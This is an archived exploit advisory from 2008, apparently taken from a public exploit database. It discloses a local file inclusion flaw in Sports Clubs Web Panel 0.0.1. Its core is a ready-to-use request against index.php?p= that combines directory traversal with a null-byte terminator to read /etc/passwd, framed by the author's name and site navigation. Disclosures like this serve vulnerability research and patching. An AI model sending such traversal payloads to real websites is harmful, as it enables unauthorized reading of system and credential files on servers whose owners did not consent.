[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability
# Published : 2008-09-11
# Author : StAkeR
# Previous Title : Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability
# Next Title : Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
--==+============================================================================+==--
--==+ Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability +==--
--==+============================================================================+==--
[*] Discovered By: StAkeR ~ StAkeR@hotmail.it
[+] Discovered On: 11 Sep 2008
[+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370
[*] Vulnerability:
[*] LFI
[+] index.php?p= [File %00]
[+] http://site.com/index.php?p=../../../../../../../etc/passwd%00
# www.Syue.com [2008-09-11]